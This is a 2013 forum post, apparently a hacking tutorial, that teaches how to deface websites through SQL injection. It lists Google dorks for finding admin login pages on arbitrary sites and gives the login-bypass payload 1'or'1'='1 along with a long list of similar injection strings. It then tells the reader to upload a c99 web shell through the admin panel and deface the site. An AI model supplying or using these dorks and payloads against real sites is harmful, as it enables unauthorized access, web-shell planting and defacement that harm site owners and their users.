A Basic SQL injection; How hackers deface by using it

Discussion in 'Introduce Yourself' started by Musadiq, 26 Jan 2013.

  1. Musadiq

    Musadiq Active Member

    Joined:
    26 Jan 2013
    Messages:
    7
    Likes Received:
    0
    I have been giving tutorials on the hacking of websites through various techniques like LFI, RFI, SQLi etc. Sql injection can be done by using various tools like Acunetix, SQL helper, Havij etc. In my past tutorial I
    showed you how havij is used by the hackers to scan a website for
    vulnerability and then take advantage of the loop hole and gain access to the website. There are various methods of this technique and In this tutorial I will be describing a very basic and simple Structured Query Language Injection (SQLi). Apart from this let me also tell that SQL injection technique is widely used by hackers. I am of the perception that if 100 sites are hacked, 70 will be due to sql injection. In this tutorial we will come to know how to find the website’s admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When we enter into the admin panel what we have to do is to find a file upload option and just upload a shell there like c99 shell etc. and finally deface the same.

    Dorks for SQLi

    : inurl:adminlogin.aspx

    inurl:admin/index.php

    inurl:administrator.php

    inurl:administrator.asp

    inurl:login.asp

    inurl:login.aspx

    inurl:login.php

    inurl:admin/index.php

    inurl:adminlogin.aspx #


    By entering these dorks many of the sites will open up having /adminlogin.aspx in their URL.

    Select any website, you will get the admin panel of the said website.

    Fill the details as:

    User: 1'or'1'='1

    Password: 1'or'1'='1

    Using the above mentioned login details and you will enter into the admin panel of a website.It will not work for all the websites but this is what is called a basic sql injection?





    Other Injection Queries are like this:



    ‘ or 1=1 –
    1'or’1'=’1
    admin’–
    ” or 0=0 –
    or 0=0 –
    ‘ or 0=0 #
    ” or 0=0 #
    or 0=0 #
    ‘ or ‘x’='x
    ” or “x”=”x
    ‘) or (‘x’='x
    ‘ or 1=1–
    ” or 1=1–
    or 1=1–
    ‘ or a=a–
    ” or “a”=”a
    ‘) or (‘a’='a
    “) or (“a”=”a
    hi” or “a”=”a
    hi” or 1=1 –
    hi’ or 1=1 –
    hi’ or ‘a’='a
    hi’) or (‘a’='a
    hi”) or (“a”=”)
    --- Double Post Merged, 26 Jan 2013 ---
    You can Visit www.hacktheway.org
    to learn more
     

Share This Page

Loading...